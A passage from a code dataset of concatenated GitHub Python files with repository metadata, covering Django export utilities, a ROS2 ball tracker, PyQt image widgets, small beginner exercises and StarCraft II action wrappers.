self.criteria_weights[criterion]/total_weight * self.scores[criterion]\n elif stars_averaging == 'equi':\n no_none = [score for score in self.scores.values() if score != None]\n if no_none:\n self.estimated_stars = sum(no_none)/len(no_none)\n\nclass Sentence():\n\n def __init__(self, raw_sentence, review_idx, sentence_idx):\n self.raw_sentence = raw_sentence\n self.review_idx = review_idx\n self.idx = sentence_idx\n self.criterion = None\n self.polarity_score = None\n","repo_name":"sandrinedacol/multicriteria-ratings","sub_path":"modules/reviews.py","file_name":"reviews.py","file_ext":"py","file_size_in_byte":6265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"23031198958","text":"import csv\nfrom xml.dom.minidom import Document\nimport hashlib\n\nfrom django.http import HttpResponse, HttpResponseBadRequest\nfrom django.template.defaultfilters import slugify\nfrom django.utils import simplejson as json\n\n\n## Taken from http://djangosnippets.org/snippets/790/\ndef export_csv(qs, filename, fields=None):\n model = qs.model\n response = HttpResponse(mimetype='text/csv')\n response['Content-Disposition'] = ('attachment; filename=%s.csv'\n % slugify(filename))\n writer = csv.writer(response)\n # Write headers to CSV file\n if fields:\n headers = fields\n else:\n headers = []\n for field in model._meta.fields:\n headers.append(field.name)\n fields = headers\n _headers = []\n for header in headers:\n if header:\n _headers.append(header)\n else:\n _headers.append(unicode(model._meta.verbose_name))\n\n headers = _headers\n\n writer.writerow(headers)\n # Write data to CSV file\n for obj in qs:\n row = []\n for field in fields:\n if field == '':\n val = unicode(obj)\n else:\n val = getattr(obj, field)\n if callable(val):\n val = val()\n elif getattr(val, 'all', None):\n val = ', '.join([unicode(item) for item in val.all()])\n # work around csv unicode limitation\n elif type(val) == unicode:\n val = val.encode(\"utf-8\")\n row.append(val)\n writer.writerow(row)\n # Return CSV file to browser as download\n return response\n\n\ndef export_json(qs, filename, fields=None):\n model = qs.model\n\n if not fields:\n headers = []\n for field in model._meta.fields:\n headers.append(field.name)\n fields = headers\n objs = []\n for obj in qs:\n item = {}\n for field in fields:\n if field == '':\n field = unicode(obj._meta.verbose_name)\n val = unicode(obj)\n else:\n val = getattr(obj, field)\n if callable(val):\n val = val()\n elif getattr(val, 'all', None):\n val = [unicode(i) for i in val.all()]\n # work around csv unicode limitation\n elif type(val) == unicode:\n val = val.encode(\"utf-8\")\n item[field] = val\n objs.append(item)\n # Return JS file to browser as download\n serialized = json.dumps(objs)\n response = HttpResponse(serialized, mimetype='application/json')\n response['Content-Disposition'] = ('attachment; filename=%s.json'\n % slugify(filename))\n return response\n\n\ndef export_xml(qs, filename, fields=None):\n model = qs.model\n xml = Document()\n root = xml.createElement(filename)\n xml.appendChild(root)\n if not fields:\n headers = []\n for field in model._meta.fields:\n headers.append(field.name)\n fields = headers\n for obj in qs:\n item = xml.createElement(model._meta.object_name)\n item.setAttribute(\"id\", unicode(obj))\n for field in fields:\n if field != '':\n val = getattr(obj, field)\n if getattr(val, 'all', None):\n for v in val.all():\n element = xml.createElement(field)\n xmlval = xml.createTextNode(unicode(v))\n element.appendChild(xmlval)\n item.appendChild(element)\n else:\n if callable(val):\n val = val()\n # work around csv unicode limitation\n elif type(val) == unicode:\n val = val.encode(\"utf-8\")\n\n element = xml.createElement(field)\n xmlval = xml.createTextNode(val)\n element.appendChild(xmlval)\n item.appendChild(element)\n root.appendChild(item)\n # Return xml file to browser as download\n response = HttpResponse(xml.toxml(), mimetype='application/xml')\n response['Content-Disposition'] = ('attachment; filename=%s.xml'\n % slugify(filename))\n return response\n\n\nexport_modes = {\n 'csv': export_csv,\n 'json': export_json,\n 'xml': export_xml,\n }\n\n\ndef export_query_set(mode, qs, filename, fields=None):\n if mode in export_modes:\n return export_modes[mode](qs, filename, fields)\n else:\n content = \"Error 400, Format %s is not supported\" % mode\n return HttpResponseBadRequest(content)\n","repo_name":"Yaco-Sistemas/met","sub_path":"met/metadataparser/query_export.py","file_name":"query_export.py","file_ext":"py","file_size_in_byte":4765,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"43513254364","text":"from django import forms\n\n\nclass RegistrationLinkAdminForm(forms.ModelForm):\n def __init__(self, data=None, *args, **kwargs):\n super().__init__(data, *args, **kwargs)\n\n # limit choices of subjects\n subjects_choices = self.fields[\"subject_variants\"].widget.choices\n subjects_choices.queryset = subjects_choices.queryset.filter(\n subject__school_year=self.school_year,\n subject__subject_type=self.subject_type,\n )\n","repo_name":"leprikon-cz/leprikon","sub_path":"leprikon/forms/registrationlink.py","file_name":"registrationlink.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"99"} +{"seq_id":"21639920127","text":"# TKinter documentation: http://tcl.tk/man/tcl8.6/TkCmd/label.htm\nimport tkinter\n\n# Tk() is like screen in Turtle!\nwindow = tkinter.Tk()\nwindow.title(\"My First GUI Program\")\nwindow.minsize(width=500, height=300)\n\n\n# 🟪 Label\nmy_label = tkinter.Label(text=\"I Am a Label\", font=(\"Arial\", 24, \"bold\"))\nmy_label.pack() # Pack our label onto the screen! (이 라인이 없으면 label이 안보임!)\n # pack()안에 들어갈 arguments가 ...면 default value가 있다는 뜻!!\n# Packer: Geometry Management System (It's just a simple way to lay out the components that you're building.)\n\nimport turtle\ntim = turtle.Turtle()\ntim.write(\"Hello\") # arguments중 arg: 에는 ...가 없다. 그러므로 Default 값이 없으므로 무조건 부여해주어야하는 값!\n\n# window.mainloop() behaves like while loop when we covered Turtle\nwindow.mainloop() # Always at the end of the program\n","repo_name":"Komerica/python","sub_path":"udemy/day-27(tkinter, label)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"10449191994","text":"largest = None\nsmallest = None\n\nwhile True:\n num = input(\"Enter a number: \")\n if num == \"done\":\n break\n try:\n num = int(num)\n if(largest == None):\n largest = num\n else:\n if(largest < int(num)):\n largest = int(num)\n if(smallest == None):\n smallest = num\n else:\n if(smallest > int(num)):\n smallest = int(num)\n except:\n print(\"Invalid input\")\n\nprint(\"Maximum is\", largest)\nprint(\"Minimum is\", smallest)\n","repo_name":"shelcia/InterviewQuestionPython","sub_path":"Coursera/FinalProgram.py","file_name":"FinalProgram.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"45199158088","text":"import logging\nfrom customUser.models import Orders, PaymentDetails\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom customAdmin.helpers import send_email\nfrom .models import Email_Template, Product, User\n\nlogger = logging.getLogger(__name__)\n\n\n# @receiver(post_save, sender=User)\ndef handle_email(sender, instance, created, **kwargs):\n try:\n email = Email_Template.objects.get(code='ET05')\n if created:\n send_email(\n emails=[value.email for value in User.objects.filter(\n is_superuser=True)],\n subject=email.subject,\n message=email.message,\n username=instance.username,\n user_email=instance.email\n )\n except Exception as e:\n logger.error(e)\n\n# @receiver(post_save, sender=User)\n# def handle_cart(sender, instance, created, **kwargs):\n# try:\n# if created:\n# if request.session.session_key:\n# cart = []\n# for key, value in request.session.items():\n# if key == '_auth_user_id' or key == '_auth_user_backend' or key == '_auth_user_hash':\n# pass\n# else:\n# cart.append({'key': int(key), 'quantity': int(value)})\n# login(request, user)\n# for product in cart:\n# ProductDetails.add_product(\n# self, request, product['key'], product['quantity'])\n# except Exception as e:\n# logger.error(e)\n\n\n# @receiver(post_save, sender=Orders)\ndef handle_payment(sender, instance, created, **kwargs):\n try:\n if created:\n PaymentDetails.objects.create(\n payment_status='Pending',\n order_id=instance.id,\n user_id=instance.user_id,\n )\n except Exception as e:\n logger.error(e)\n\n# @receiver(post_save, sender=Product)\n\n\ndef handle_out_of_stock_status(sender, instance, created, **kwargs):\n try:\n if created:\n if instance.quantity <= 0:\n instance.out_of_stock_status = True\n except Exception as e:\n logger.error(e)\n\n\npost_save.connect(handle_payment, sender=Orders)\n\npost_save.connect(handle_email, sender=User)\n\npost_save.connect(handle_out_of_stock_status, sender=Product)\n","repo_name":"Khushi-Jain1/ecommerce_django","sub_path":"customAdmin/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"18087589558","text":"dic= {\n 'a':50, \n 'b':58, \n 'c':56,\n 'd':40, \n 'e':100, \n 'f':20\n }\nlist1=[]\nfm=0\nsm=0\ntm=0\nfor i in dic:\n for j in dic:\n if dic[j]>fm:\n fm=dic[j]\n if fm>dic[j] and dic[j]>sm:\n sm=dic[j]\n if sm>dic[j] and dic[j]>tm:\n tm=dic[j]\nlist1.append(fm)\nlist1.append(sm)\nlist1.append(tm)\nprint(list1)\n\n","repo_name":"ShubhamKulkarni1495/Dictionary","sub_path":"Dictionary/meraki/q11.py","file_name":"q11.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"13304546246","text":"import random\ndef coinToss():\n number = input(\"Number of times to flip coin: \")\n recordList = []\n heads = 0\n tails = 0\n for amount in range(number):\n flip = random.randint(0, 1)\n if (flip == 0):\n print(\"Heads\")\n recordList.append(\"Heads\")\n else:\n print(\"Tails\")\n recordList.append(\"Tails\")\n print(str(recordList))\n print(str(recordList.count(\"Heads\")) + str(recordList.count(\"Tails\")))\n","repo_name":"aliya-rahmani/Projects","sub_path":"Python/coinflip.py","file_name":"coinflip.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"99"} +{"seq_id":"28298998990","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n###################################################################\n# Author: wang donghao\n# Date : 2020.7\n# Email : dd.parkhere@gmail.com\n###################################################################\n\nfrom dayu_widgets.qt import *\nimport os\nimport shutil\nfrom config import envs\nreload(envs)\n\n\nclass WImage(QWidget):\n _prePixmap = None\n\n @property\n def prePixmap(self):\n return self._prePixmap\n\n @prePixmap.setter\n def prePixmap(self, imagePath):\n self.img_path = imagePath\n # if not os.path.exists(imagePath):\n # raise\n\n # self.title.setText(os.path.splitext(os.path.basename(imagePath))[0])\n\n self._prePixmap = None\n # temp_folder = envs.env_dict.get('WOK_TEMP_DIR')\n # file_name = temp_folder.split('/')[-1].split('\\\\')[-1]\n # dest_thumb = temp_folder + file_name\n # shutil.copyfile(imagePath.encode('GB2312'), dest_thumb)\n # img = QImage(dest_thumb)\n # print imagePath\n # img = img.scaledToWidth(40)\n # self._prePixmap = QPixmap.fromImage(img)\n self._prePixmap = QPixmap(imagePath)\n if self._prePixmap.isNull():\n self._prePixmap.load(imagePath, 'jpg')\n\n def __init__(self, parent=None):\n super(WImage, self).__init__(parent)\n\n mainLayout = QVBoxLayout()\n mainLayout.setSpacing(0)\n self.setLayout(mainLayout)\n\n # self.title = QLabel('preview')\n # self.title.setAlignment(Qt.AlignCenter)\n # mainLayout.addWidget(self.title)\n\n self.previewLabel = QLabel()\n self.previewLabel.setSizePolicy(QSizePolicy.Expanding,\n QSizePolicy.Expanding)\n self.previewLabel.setAlignment(Qt.AlignCenter)\n self.previewLabel.setMinimumSize(40, 40)\n mainLayout.addWidget(self.previewLabel)\n\n sizePolicy = QSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.sizePolicy().hasHeightForWidth())\n\n self.setSizePolicy(sizePolicy)\n\n self.img_path = ''\n\n def resizeEvent(self, QResizeEvent):\n scaledSize = self.prePixmap.size()\n scaledSize.scale(self.previewLabel.size(), Qt.KeepAspectRatio)\n if not self.previewLabel.pixmap() or scaledSize != self.previewLabel.pixmap().size():\n self.updatePreviewLabel()\n\n def updatePreviewLabel(self):\n self.previewLabel.setPixmap(self.prePixmap.scaled(\n self.previewLabel.size(), Qt.KeepAspectRatio,\n Qt.SmoothTransformation))\n\n def mouseDoubleClickEvent(self, *args, **kwargs):\n thumbnail_win = QDialog(self.parent())\n layout = QHBoxLayout()\n label = QLabel()\n label.setPixmap(self.prePixmap)\n layout.addWidget(label)\n thumbnail_win.setLayout(layout)\n thumbnail_win.show()\n # os.startfile(self.img_path)\n\n\nclass WImage2(QLabel):\n\n def __init__(self, parent=None, img_path=''):\n super(WImage2, self).__init__(parent=parent)\n default = os.environ['WOKWOK_ROOT'] + '/resources/icons/thumb-load-error.png'\n if not os.path.isfile(img_path):\n img_path = default\n try:\n img = QImage(img_path)\n except:\n img = QImage(default)\n w, h = img.width(), img.height()\n for _ in xrange(999):\n if w <= 100:\n break\n w = w * 0.9\n h = h * 0.9\n size = QSize(w, h)\n pic = QPixmap(img.scaled(size, Qt.IgnoreAspectRatio))\n # widget.setFixedSize(30, 20)\n self.prePixmap = QPixmap(img_path)\n self.setPixmap(pic)\n\n def mouseDoubleClickEvent(self, *args, **kwargs):\n thumbnail_win = QDialog(self.parent())\n layout = QHBoxLayout()\n label = QLabel()\n label.setPixmap(self.prePixmap)\n layout.addWidget(label)\n thumbnail_win.setLayout(layout)\n thumbnail_win.show()\n # os.startfile(self.img_path)\n\n\nclass WThumbnailDelegate(QItemDelegate):\n def __init__(self, parent=None):\n super(WThumbnailDelegate, self).__init__(parent=parent)\n\n def paint(self, painter, option, index):\n painter.save()\n painter.setPen(QPen(Qt.NoPen))\n value = index.data(Qt.DisplayRole)\n pix_map = QPixmap(value) # .scaledToWidth(100)\n pix_bili = float(pix_map.width())/pix_map.height()\n new_height = 100.0/pix_bili\n pix_map = pix_map.scaled(100.0, new_height)\n painter.drawPixmap(option.rect, pix_map)\n painter.restore()\n self.parent().setRowHeight(index.row(), new_height)\n\n\n","repo_name":"DangoWang/WOKWOK","sub_path":"widgets/thumbnail_delegate.py","file_name":"thumbnail_delegate.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"27116076933","text":"#first we can use files that time import library is known as inside flies folder library .\nfrom files import addition,factorial,multiplication,pattern,subtraction\n\n#check the directry of files folder \n\n# print(dir(files)) :- check the directry\n\n# whiile True:\n# addition modules files access\n# b = int(input(\"Enter Your Second : \"))\n# a = int(input(\"Enter Your First : \"))\n\n# help(files) :- help the files\n\nadd = addition.addition(12, 23)\nprint(f\"This is addition for two no :{add}\\n\")\n\n\n# subtraction modules files access \n# a = int(input(\"Enter Your First : \"))\n# b = int(input(\"Enter Your Second : \"))\n\nsub = subtraction.substraction(10, 20)\nprint(f\"This is Subtraction is {sub}\\n\")\n\n# this is multiplication\n\nmul = multiplication.multiplication(10, 5)\nprint(f\"This is multiplication {mul}\\n\")\n\n#this is pattern design \n\npattern.pattern(5)\n\n\n\n\n","repo_name":"PushpendraMaurya/Python-Full-Stack-Developrs-Notes--2023--Portions","sub_path":"Full Python-Syllabus-Explanation/Library/Modules/User Define Modules/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"74439635204","text":"from collections import defaultdict\n\nif __name__ == '__main__':\n N = int(input())\n city_len = [0] + list(map(int, input().split()))\n city = list(map(int, input().split()))\n\n ans_dict = defaultdict(int)\n temp = city[0]\n\n for i in range(1,len(city)):\n ans_dict[temp] += city_len[i]\n if temp > city[i]:\n temp = city[i]\n\n ans = 0\n for k in ans_dict.keys():\n ans += (k * ans_dict[k])\n\n print(ans)","repo_name":"gan-ta/Algorithm","sub_path":"BackJoonOnline/[BOJ]13305_주유소.py","file_name":"[BOJ]13305_주유소.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4964448723","text":"#---------EXERCICE 1--------#\n\"\"\"extraire l'ensemble des voyelles\"\"\"\n\nfrom typing import AsyncGenerator\n\n\ndef extrait_ensemble_voyelles():\n mot=\"quelconque\"\n while mot !=\"fin\":\n mot= input(\"rentrez un mot(sans accent):\")\n#on met toutes les lettres en miniscule \n mot_min= mot.lower()\n#on crée la liste des voyelles\n liste_voyelles=\"a\",\"e\",\"i\",\"o\",\"u\",\"y\"\n\n#on initialise le compteur de voyelles\n nb_voyelles= 0\n\n#la boucle de comptage\n for lettre in mot_min:\n if lettre in liste_voyelles:\n nb_voyelles +=1\n\n#l'affichage des résultats\n if nb_voyelles==0:\n return (\"il n'y a pas de voyelles dans le mot\\\" +mot+\"\"\\\".\\n\")\n elif nb_voyelles==1:\n return (\"il y a une seule voyelle dans le mot\\\" +mot+\"\"\\\".\\n\")\n else:\n return(\"n\\n\")\n return nb_voyelles.lower()\n #input(\"appuyer sur entrer pour terminer le programme\")\n\n#exercice2\ndef transforme_en_numeros(mot):\n \n if len(age) != 1:\n return 0\n new = ord(age)\n if 65 <= new <= 90:\n # Lettre majuscule\n return new - 64\n elif 97 <= new <= 122:\n # letter miniscule\n return new - 96\n # caractère méconnu\n return 0\n#exercice 3\n\ndef contenu_cellule(colonne, ligne, univers):\n pass\n\n\n","repo_name":"yvann-TEFLAN/EVALUATION1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"37261336548","text":"import numpy as np\n\na = {'a' : 0, 'b':1, 'c':2}\n\n# for attr in dir(a):\n# print(attr)\n\na = 10\n# print(id(a))\n\na = 20\n# print(id(a))\n\na = np.array([1,2,3])\nb = [1,2,3]\nc = (1,2,3)\nprint(type(a))\nfor attr in dir(a):\n if not attr.startswith('__'):\n print(attr)\n\nprint(type(b))\nfor attr in dir(b):\n if not attr.startswith('__'):\n print(attr)\n\nprint(type(c))\nfor attr in dir(c):\n if not attr.startswith('__'):\n print(attr)\n\nx = {'a' : 1, 'b' : 2}\ny = {'b' : 3, 'c' : 4}\n\nz = {**x, **y}\n\nprint(z)\n\na = [1,2,3]\nb = [4,5,6]\n\nprint(\"enumerate(a+b)\")\nfor index, value in enumerate(a+b):\n print(index,value)\n\nprint(\"enumerate(zip(a+b))\")\nfor index, value in enumerate(zip(a+b)):\n print(index,value)\n\n\nprint(zip(a))","repo_name":"doyou1/python_workspace","sub_path":"lecture02_opjects-in-python/lecture2.py","file_name":"lecture2.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"41614926742","text":"import rclpy\nfrom rclpy.node import Node\nfrom sensor_msgs.msg import CompressedImage\nfrom geometry_msgs.msg import Twist\nfrom cv_bridge import CvBridge\nimport cv2\nimport numpy as np\n\nclass BallTracker(Node):\n\n def __init__(self):\n super().__init__('ball_tracker')\n\n self.publisher_ = self.create_publisher(Twist, '/cmd_vel', 10)\n timer_period = 0.5 # seconds\n self.timer = self.create_timer(timer_period, self.timer_callback)\n\n self.subscription = self.create_subscription(\n CompressedImage, \n '/image_raw/compressed', \n self.listener_callback, \n 10)\n self.subscription \n\n self.br = CvBridge()\n\n self.linear = 0.0\n self.angular = 0.0\n\n # 追従する対象の画像中の幅(画像中の対象物の大きさが常にこの値になるように制御指令を計算する)\n self.target_width = 150\n \n\n def timer_callback(self):\n msg = Twist()\n msg.linear.x = self.linear\n msg.angular.z = self.angular\n self.publisher_.publish(msg)\n\n\n def listener_callback(self, data):\n frame = self.br.compressed_imgmsg_to_cv2(data)\n\n hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # 緑色のボールを検出する\n lower_color = np.array([30, 64, 0])\n upper_color = np.array([90,255,255])\n mask = cv2.inRange(hsv, lower_color, upper_color)\n contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n l = a = 0.0\n rects = []\n \n for contour in contours:\n hull = cv2.convexHull(contour)\n rect = cv2.boundingRect(hull)\n rects.append(np.array(rect))\n\n if len(rects) > 0:\n # 面積が最大の領域を抽出\n rect = max(rects, key=(lambda x: x[2] * x[3]))\n cv2.rectangle(frame, tuple(rect[0:2]), tuple(rect[0:2] + rect[2:4]), (0, 0, 255), thickness=2)\n\n x = rect[0]\n y = rect[1]\n w = rect[2]\n h = rect[3]\n cx = int(rect[0]+rect[2]/2)\n cy = int(rect[1]+rect[3]/2)\n\n cv2.drawMarker(frame, (cx, cy), color=(255, 0, 0), markerType=cv2.MARKER_TILTED_CROSS, thickness=2)\n\n # 目標位置との差分を計算する \n dw = 0.005 * (self.target_width - w) # 前後方向\n dx = 0.005 * (640/2 - cx) # 旋回方向\n \n l = 0.0 if abs(dw) < 0.03 else dw # ±10未満ならゼロにする\n # 前後方向のソフトウェアリミッタ\n l = 0.05 if l > 0.05 else l\n l = -0.05 if l < -0.05 else l\n \n a = 0.0 if abs(dx) < 0.3 else dx # ±20未満ならゼロにする\n # 旋回方向のソフトウェアリミッタ\n a = 0.5 if a > 0.5 else a\n a = -0.5 if a < -0.5 else a\n\n\n print('dw=%f l=%f dx=%f a=%f'%(dw, l, dx, a))\n\n self.linear = l\n self.angular = a\n\n cv2.imshow(\"camera\", frame)\n cv2.waitKey(1)\n\n\ndef main(args=None):\n rclpy.init(args=args)\n ball_tracker = BallTracker()\n rclpy.spin(ball_tracker)\n ball_tracker.destroy_node()\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()\n","repo_name":"te260ku/turtle-dog","sub_path":"src/ball_tracking/ball_tracking/ball_tracking.py","file_name":"ball_tracking.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"43073711048","text":"def search_rotated(arr,key):\n start,end= 0,len(arr)-1\n while start<=end:\n mid = start+ (end-start)//2\n if arr[mid] ==key:\n return mid\n \n if arr[start] <= arr[mid] :\n if key >arr[start] and key < arr[mid]:\n end = mid-1\n else:\n start=mid-1\n else:\n if key >arr[mid] and key = section2[0] and section1[1] >= section2[1]:\n return [section1[0], section2[1]]\n elif section1[0] <= section2[0] and section1[1] <= section2[1]:\n return [section2[0], section1[1]]\n elif section1[0] >= section2[0] and section1[1] <= section2[1]:\n return section1\n else:\n return section2\n\n\ndef solution(routes):\n answer = 0\n\n for i in range(len(routes)):\n routes[i].append(abs(routes[i][0] - routes[i][1]))\n\n routes.sort(key=lambda x: x[2]) # 거리로 오름차순 정렬\n\n camera_section = list()\n for s, e, d in routes:\n is_overlap = False\n for i in range(len(camera_section)):\n if check_overlap([s, e], camera_section[i]): # 겹침\n is_overlap = True\n camera_section[i] = get_overlapped([s, e], camera_section[i])\n break\n\n if not is_overlap: # 겹치는 포인트 없음\n camera_section.append([s, e])\n answer += 1\n\n return answer\n\n\nprint(solution([[0, 0], [0, 0], [2, 2]])) # 2\n\n# 틀림\n","repo_name":"BearHunter49/Algorithm","sub_path":"Programmers/Level3/단속카메라.py","file_name":"단속카메라.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"46186657015","text":"from urnai.agents.actions import sc2 as scaux\nfrom .defeatenemies import DefeatEnemiesDeepRTSActionWrapper, DefeatEnemiesStarcraftIIActionWrapper \nfrom urnai.agents.rewards.scenarios.rts.generalization.buildunits import BuildUnitsGeneralizedRewardBuilder \nfrom pysc2.lib import actions, features, units\nfrom statistics import mean\nfrom pysc2.env import sc2_env\nimport random\n\nclass BuildUnitsDeepRTSActionWrapper(DefeatEnemiesDeepRTSActionWrapper):\n def __init__(self):\n super().__init__()\n self.do_nothing = 17\n self.build_farm = 18\n self.build_barrack = 19\n self.build_footman = 20\n\n self.final_actions = [self.do_nothing, self.build_farm, self.build_barrack, self.build_footman] \n self.named_actions = [\"do_nothing\", \"build_farm\", \"build_barrack\", \"build_footman\"]\n self.action_indices = range(len(self.final_actions))\n\n def solve_action(self, action_idx, obs):\n if action_idx != None:\n if action_idx != self.noaction:\n i = action_idx \n self.action_queue.append(self.final_actions[i])\n else:\n # if action_idx was None, this means that the actionwrapper\n # was not resetted properly, so I will reset it here\n # this is not the best way to fix this\n # but until we cannot find why the agent is\n # not resetting the action wrapper properly\n # i'm gonna leave this here\n self.reset()\n\nclass BuildUnitsStarcraftIIActionWrapper(DefeatEnemiesStarcraftIIActionWrapper):\n\n SUPPLY_DEPOT_X = 42\n SUPPLY_DEPOT_Y = 42\n BARRACK_X = 39\n BARRACK_Y = 36\n\n ACTION_DO_NOTHING = 7\n ACTION_BUILD_SUPPLY_DEPOT = 8\n ACTION_BUILD_BARRACK = 9\n ACTION_BUILD_MARINE = 10\n\n MAP_PLAYER_SUPPLY_DEPOT_COORDINATES = [\n {\"x\" : SUPPLY_DEPOT_X, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 2, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 4, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 6, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 8, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 10, \"y\" : SUPPLY_DEPOT_Y},\n {\"x\" : SUPPLY_DEPOT_X - 12, \"y\" : SUPPLY_DEPOT_Y},\n ]\n\n MAP_PLAYER_BARRACK_COORDINATES = [\n {\"x\" : BARRACK_X, \"y\" : BARRACK_Y},\n {\"x\" : BARRACK_X, \"y\" : BARRACK_Y - 6},\n ]\n\n def __init__(self):\n super().__init__()\n\n self.do_nothing = BuildUnitsStarcraftIIActionWrapper.ACTION_DO_NOTHING\n self.build_supply_depot = BuildUnitsStarcraftIIActionWrapper.ACTION_BUILD_SUPPLY_DEPOT \n self.build_barrack = BuildUnitsStarcraftIIActionWrapper.ACTION_BUILD_BARRACK\n self.build_marine = BuildUnitsStarcraftIIActionWrapper.ACTION_BUILD_MARINE\n self.actions = [self.do_nothing, self.build_supply_depot, self.build_barrack, self.build_marine]\n self.named_actions = [\"do_nothing\", \"build_supply_depot\", \"build_barrack\", \"build_marine\"]\n self.action_indices = range(len(self.actions))\n self.barrack_coords = BuildUnitsStarcraftIIActionWrapper.MAP_PLAYER_BARRACK_COORDINATES\n self.supply_depot_coords = BuildUnitsStarcraftIIActionWrapper.MAP_PLAYER_SUPPLY_DEPOT_COORDINATES\n\n def solve_action(self, action_idx, obs):\n if action_idx != None:\n if action_idx != self.noaction:\n BuildUnitsGeneralizedRewardBuilder.LAST_CHOSEN_ACTION = self.actions[action_idx]\n action = self.actions[action_idx]\n if action == self.do_nothing:\n self.collect_idle(obs)\n elif action == self.build_supply_depot:\n self.build_supply_depot_(obs)\n elif action == self.build_barrack:\n self.build_barrack_(obs)\n elif action == self.build_marine:\n self.build_marine_(obs)\n elif action == self.stop:\n self.pending_actions.clear()\n else:\n # if action_idx was None, this means that the actionwrapper\n # was not resetted properly, so I will reset it here\n # this is not the best way to fix this\n # but until we cannot find why the agent is\n # not resetting the action wrapper properly\n # i'm gonna leave this here\n self.reset()\n\n def collect(self, obs):\n #get SCV list\n scvs = scaux.get_my_units_by_type(obs, units.Terran.SCV)\n #get mineral list\n mineral_fields = scaux.get_neutral_units_by_type(obs, units.Neutral.MineralField)\n #split SCVs into sets of numberSCVs/numberOfMinerals\n n = int(len(scvs)/len(mineral_fields))\n scvs_sets = [scvs[i * n:(i + 1) * n] for i in range((len(scvs) + n - 1) // n )]\n #make every set of SCVs collect one mineral \n for i in range(len(mineral_fields)):\n mineral = mineral_fields[i]\n scvset = scvs_sets[i]\n for scv in scvset:\n self.pending_actions.append(actions.RAW_FUNCTIONS.Harvest_Gather_unit(\"queued\", scv.tag, mineral.tag))\n\n def collect_idle(self, obs):\n scv = scaux.get_random_idle_worker(obs, sc2_env.Race.terran)\n mineral = random.choice(scaux.get_neutral_units_by_type(obs, units.Neutral.MineralField))\n if scv != scaux._NO_UNITS: \n self.pending_actions.append(actions.RAW_FUNCTIONS.Harvest_Gather_unit(\"queued\", scv.tag, mineral.tag))\n\n def select_random_scv(self, obs):\n #get SCV list\n scvs = scaux.get_my_units_by_type(obs, units.Terran.SCV)\n length = len(scvs)\n scv = scvs[random.randint(0, length - 1)] \n return scv\n\n def build_supply_depot_(self, obs):\n #randomly select scv\n #get coordinates\n #x, y = BuildUnitsStarcraftIIActionWrapper.SUPPLY_DEPOT_X, BuildUnitsStarcraftIIActionWrapper.SUPPLY_DEPOT_Y\n coord = random.choice(self.supply_depot_coords)\n x, y = coord['x'], coord['y']\n scv = self.select_random_scv(obs)\n #append action to build supply depot\n self.pending_actions.append(actions.RAW_FUNCTIONS.Build_SupplyDepot_pt(\"now\", scv.tag, [x, y]))\n\n def build_barrack_(self, obs):\n #randomly select scv\n #get coordinates\n #x, y = BuildUnitsStarcraftIIActionWrapper.BARRACK_X, BuildUnitsStarcraftIIActionWrapper.BARRACK_Y \n coord = random.choice(self.barrack_coords)\n x, y = coord['x'], coord['y']\n scv = self.select_random_scv(obs)\n #append action to build supply depot\n self.pending_actions.append(actions.RAW_FUNCTIONS.Build_Barracks_pt(\"now\", scv.tag, [x, y]))\n\n def build_marine_(self, obs):\n barracks = scaux.get_my_units_by_type(obs, units.Terran.Barracks)\n if len(barracks) > 0:\n barrack = random.choice(barracks)\n self.pending_actions.append(actions.RAW_FUNCTIONS.Train_Marine_quick(\"now\", 